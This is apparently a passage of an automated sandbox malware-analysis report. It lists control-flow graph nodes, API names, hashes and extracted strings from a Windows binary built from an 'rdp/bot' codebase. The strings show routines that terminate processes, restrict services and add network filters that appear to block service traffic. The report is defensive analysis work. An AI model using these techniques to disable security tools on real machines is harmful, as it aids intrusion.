10240->10241 10244 7ff70489b3e7 fputc 10240->10244 10242 7ff70489bba6 10241->10242 10245 7ff70489b3e7 fputc 10241->10245 10242->10238 10243 7ff70489b3e7 fputc 10243->10246 10244->10240 10245->10241 10246->10240 10246->10243 11406 7ff704892463 11407 7ff704892484 CloseHandle 11406->11407 11426 7ff7048923f0 11407->11426 11408 7ff7048926ed Process32Next 11409 7ff704892704 GetLastError 11408->11409 11408->11426 11409->11426 11410 7ff704892888 CloseHandle 11412 7ff7048928a3 11410->11412 11413 7ff7048921e4 11410->11413 11420 7ff7048914e2 6 API calls 11412->11420 11413->11412 11417 7ff7048921f4 11413->11417 11414 7ff7048914e2 6 API calls 11414->11426 11415 7ff7048924d3 OpenProcess 11418 7ff7048925a3 GetLastError 11415->11418 11419 7ff7048924f4 TerminateProcess 11415->11419 11416 7ff7048924c2 strcmp 11416->11415 11416->11426 11421 7ff7048914e2 6 API calls 11417->11421 11422 7ff7048914e2 6 API calls 11418->11422 11419->11407 11423 7ff70489250a GetLastError 11419->11423 11424 7ff704892211 11420->11424 11421->11424 11422->11426 11425 7ff7048914e2 6 API calls 11423->11425 11425->11426 11426->11407 11426->11408 11426->11410 11426->11414 11426->11415 11426->11416 11427 7ff704893c63 11428 7ff704893cec 11427->11428 11429 7ff704893d7d 11428->11429 11431 7ff704893d02 11428->11431 11430 7ff7048914e2 6 API calls 11429->11430 11432 7ff704893d30 11430->11432 11433 7ff7048914e2 6 API calls 11431->11433 11433->11432 10925 7ff704893b64 10926 7ff704893bc1 10925->10926 10927 7ff704893b8a 10925->10927 10930 7ff7048914e2 6 API calls 10926->10930 10928 7ff704893b8f 10927->10928 10929 7ff704893bec 10927->10929 10944 7ff704893909 10928->10944 10933 7ff7048914e2 6 API calls 10929->10933 10932 7ff704893bb9 10930->10932 10936 7ff704893c3e GetLastError 10932->10936 10938 7ff704893c6a 10932->10938 10933->10932 10935 7ff704893ba2 SetFileAttributesA 10935->10932 10935->10936 10937 7ff7048914e2 6 API calls 10936->10937 10937->10932 10939 7ff704893d7d 10938->10939 10942 7ff704893d02 10938->10942 10940 
7ff7048914e2 6 API calls 10939->10940 10941 7ff704893d30 10940->10941 10943 7ff7048914e2 6 API calls 10942->10943 10943->10941 10945 7ff704893921 10944->10945 10946 7ff704893998 10944->10946 10947 7ff7048939d1 10945->10947 10948 7ff70489392a GetFileAttributesA 10945->10948 10949 7ff7048914e2 6 API calls 10946->10949 10950 7ff7048914e2 6 API calls 10947->10950 10951 7ff704893a0a GetLastError 10948->10951 10954 7ff70489393b 10948->10954 10949->10954 10950->10954 10952 7ff7048914e2 6 API calls 10951->10952 10952->10954 10953 7ff7048914e2 6 API calls 10955 7ff704893b5f 10953->10955 10956 7ff704893974 10954->10956 10957 7ff704893b3a 10954->10957 10955->10955 10958 7ff7048914e2 6 API calls 10956->10958 10957->10953 10959 7ff70489398a 10958->10959 10959->10932 10959->10935 10247 7ff70489c958 10248 7ff70489c960 localeconv 10247->10248 10251 7ff70489c382 10247->10251 10249 7ff7048a026c 6 API calls 10248->10249 10249->10251 10250 7ff70489ca67 10251->10250 10252 7ff70489b3e7 fputc 10251->10252 10252->10251 10593 7ff70489de59 10594 7ff70489de6f 10593->10594 10602 7ff70489d9bb 10594->10602 10596 7ff70489e2e0 10597 7ff70489e301 10596->10597 10598 7ff70489ccd9 2 API calls 10596->10598 10598->10597 10599 7ff70489ccd9 fputwc fwprintf 10600 7ff70489db86 10599->10600 10600->10596 10600->10599 10601 7ff70489d1bd fputwc 10600->10601 10601->10600 10603 7ff70489d9cd 10602->10603 10604 7ff70489d00f 6 API calls 10603->10604 10605 7ff70489da05 10604->10605 10606 7ff70489da1a 10605->10606 10607 7ff70489da2c 10605->10607 10608 7ff70489cc00 10 API calls 10606->10608 10609 7ff70489da9d 10607->10609 10612 7ff70489da42 10607->10612 10615 7ff70489da27 10608->10615 10610 7ff70489daa1 10609->10610 10611 7ff70489daa8 strlen 10609->10611 10614 7ff70489d897 9 API calls 10610->10614 10611->10610 10613 7ff70489da4e strlen 10612->10613 10616 7ff70489da46 10612->10616 10613->10616 10614->10615 10615->10600 10617 7ff70489cdd0 9 API calls 10616->10617 10618 7ff70489da81 10617->10618 10618->10615 10619 

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno$fclosefflushfopenfseekfwrite
                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                    • API String ID: 2897271634-4120527733
                    • Opcode ID: 65d4fb601a1f5698292dcdde8469515ec84dc54ab1f3b57c9fb37bd4b7802f35
                    • Instruction ID: 6c83b4b9d03cd313f8ba3bee392ac11ee71ce0aae5944ade28f2ae45826a3e71
                    • Opcode Fuzzy Hash: 65d4fb601a1f5698292dcdde8469515ec84dc54ab1f3b57c9fb37bd4b7802f35
                    • Instruction Fuzzy Hash: 91D14C22A0CA0791FA10BF57AC80B78A751AF54B95FD94931D90D576E0DFBCF8B68320
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                    • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                    • API String ID: 1025937399-1899507746
                    • Opcode ID: f239fd8f6774d87dc5bfea94598835879428ace1de78577f0772c374105c3bb5
                    • Instruction ID: 6547c004eb5fadaed9d36331df9608014660858c77867320d46a18dbf4167606
                    • Opcode Fuzzy Hash: f239fd8f6774d87dc5bfea94598835879428ace1de78577f0772c374105c3bb5
                    • Instruction Fuzzy Hash: 23F12911F2CA0386FA717E17ACC4B789251AF46358F980C32C64F0A2D5CF6DFDA49626

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                    • String ID:
                    • API String ID: 3714283218-0
                    • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                    • Instruction ID: bb40c3caca037ffa44ae6b5dee335c720c17c23731958e243436f1c69628e783
                    • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                    • Instruction Fuzzy Hash: CF510826A09A4785FA55BF53ACD4A79A2A0AF44B84F884835C90D477D6EF6CF874C320

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                    • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                    • API String ID: 3039259412-1782951725
                    • Opcode ID: facef552b05594f5c141d541bbb0fca2f992695a7b7a944a785e6a839d7ef5e8
                    • Instruction ID: 5407f3f28965613bc5019b03582a5d4ec8562a78f25aa5cb2a8024169ed56bfb
                    • Opcode Fuzzy Hash: facef552b05594f5c141d541bbb0fca2f992695a7b7a944a785e6a839d7ef5e8
                    • Instruction Fuzzy Hash: E8D17D61A0CA8395FB20AF46ACC0BB9A250BF85344F984835DA4D477D5DF7DF8A9C720

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                    • API String ID: 3629392964-1470975255
                    • Opcode ID: 6e65bf72a18d42d1941ba8ddbea28bee3a75f355e7b060a7362c9ecff14a5aea
                    • Instruction ID: e16f23f9e95153ec5b9e0e10014919bae30a5ac1f6ac042b619377e1fcafffb6
                    • Opcode Fuzzy Hash: 6e65bf72a18d42d1941ba8ddbea28bee3a75f355e7b060a7362c9ecff14a5aea
                    • Instruction Fuzzy Hash: 3AA1C32261CBC295E7609F16BC8079AA7A1FF81784F484534EACC47B99EF7DD4A4CB10

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno$fopenfwrite
                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                    • API String ID: 1336347884-544371937
                    • Opcode ID: 3ea3d04103caf584a6be8025fb8b08055c9260d477d2a9eb3e57722f6341be90
                    • Instruction ID: 52c46a6fd8a3e887297dccb89550ee315705141c96b4f9469c73f117d90df9d7
                    • Opcode Fuzzy Hash: 3ea3d04103caf584a6be8025fb8b08055c9260d477d2a9eb3e57722f6341be90
                    • Instruction Fuzzy Hash: B7517062A0DA4382FA10BF57AD80EB8E351AF44B94FD80936D91D472D0DF6CF9769320

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                    • API String ID: 3395718042-2291025694
                    • Opcode ID: 518ad545b8143c4010e70e1190a9f3b2366be347716946774d018b99aa939417
                    • Instruction ID: 495400d6f8234a82fefd8e8e9b5e1a4065452d47196bd878ae92f2ad85225920
                    • Opcode Fuzzy Hash: 518ad545b8143c4010e70e1190a9f3b2366be347716946774d018b99aa939417
                    • Instruction Fuzzy Hash: 15514851A0CA0391FA20BF53ACC8BB89255AF45784FD80932C50E166D6DFACBDB5D361

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                    • API String ID: 2747014929-530486279
                    • Opcode ID: d1819f04df503fe90d8bfb31b2e46d2cf12326b6f8b3182bba2d6709e2339756
                    • Instruction ID: 434109b2aa46469fbdc8fe31a4d8dba56e60dd89d95942cc3764757d2400a622
                    • Opcode Fuzzy Hash: d1819f04df503fe90d8bfb31b2e46d2cf12326b6f8b3182bba2d6709e2339756
                    • Instruction Fuzzy Hash: F3813F12E0CB0B91FA357F56ACC0B78A2505F00764FD80932D92E166D1FFADBDA58362

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                    • API String ID: 1423203057-2746879330
                    • Opcode ID: 9c961685ee9913d1762ae8a659e333fbebc391308644367b099cf1cdf6e68488
                    • Instruction ID: 3106e9b654564618986bd195239fe5a208c6bd9ee9114c4c6d63b9f6a5f9a08e
                    • Opcode Fuzzy Hash: 9c961685ee9913d1762ae8a659e333fbebc391308644367b099cf1cdf6e68488
                    • Instruction Fuzzy Hash: D6A1A4A2A0DA8295FA21AF06AC80BB9A751EF41784FCC4839D94D477C5DF7CF965C320

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: 15ea6d50e65a1b7c05384c060b9ffa8fcfddfd8832c5a55c0eb87056edab8287
                    • Instruction ID: 63270dfeea49ad1686a6a877b88c25b271d40217823a91f86daf10db8a54a944
                    • Opcode Fuzzy Hash: 15ea6d50e65a1b7c05384c060b9ffa8fcfddfd8832c5a55c0eb87056edab8287
                    • Instruction Fuzzy Hash: E0519F72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: 0d5c677c755f7a7bf93115690c4c43bb76cf9dd58e87532489e7b469e434fd69
                    • Instruction ID: 5ac0bcf2a004c8da47966fde3fe48e900493e3efcf8d3abe2b84cd166ecab259
                    • Opcode Fuzzy Hash: 0d5c677c755f7a7bf93115690c4c43bb76cf9dd58e87532489e7b469e434fd69
                    • Instruction Fuzzy Hash: 3B519E72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: a7f15082d69df05f72d5037cbf794af7c80b7d5605807083d53654b9f1c948c6
                    • Instruction ID: 92f091b0bc42b12282a457720fe8c1626366134854a35503f433e2fc0e234551
                    • Opcode Fuzzy Hash: a7f15082d69df05f72d5037cbf794af7c80b7d5605807083d53654b9f1c948c6
                    • Instruction Fuzzy Hash: 9B518D72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-3780280517
                    • Opcode ID: 2ee842223cffa98dceb5b62bd9c30b65d7323fe599467d8fbc98665edec57061
                    • Instruction ID: 6c77d2b2bff2e9db79d688187cd47b4a62ab1fe32e6a510fb48adf3491910151
                    • Opcode Fuzzy Hash: 2ee842223cffa98dceb5b62bd9c30b65d7323fe599467d8fbc98665edec57061
                    • Instruction Fuzzy Hash: 804133A2E0DA47A5FA50AF42EC80BB5A360BF44344FD84836D94D066D4DFBCB9B5C364

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-386092548
                    • Opcode ID: d7ef4e8527c300b6e60fff9e20f006bb1be91614be483f3427c7aa1c32288de3
                    • Instruction ID: 59a03fd91cf941f7973be843405592af6ba53ba883e3e31ee83aeef11af832bb
                    • Opcode Fuzzy Hash: d7ef4e8527c300b6e60fff9e20f006bb1be91614be483f3427c7aa1c32288de3
                    • Instruction Fuzzy Hash: CD41ECA2A08947A1FA20AF52ACC4BB4A250BF44348FD84936D90D166D5DFBCB9B5C320

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                    • API String ID: 2918714741-1670302297
                    • Opcode ID: 8c79b365c077024c38f17f42c04b753b74df60f5a8e513a52fa5fe005987a0a9
                    • Instruction ID: a8d6c7c9a8b4acb21d7c1057776597ec787faba4156e3097647c4c8b217280e6
                    • Opcode Fuzzy Hash: 8c79b365c077024c38f17f42c04b753b74df60f5a8e513a52fa5fe005987a0a9
                    • Instruction Fuzzy Hash: 73218722A08A8696F611AF16FC80B99B750BF44744F884435EE4D47694DF7CE8A5C710

                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1
                    • API String ID: 513531256-1839485796
                    • Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                    • Instruction ID: e29c1bd5ae638d92e9c3b9e20c6158b5d73d06868b4357976e139cc003387eed
                    • Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                    • Instruction Fuzzy Hash: D0414322A0C64186F224BF12EC94BB9A250FF85784FC40431D90D57BD5CFACE571C750
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
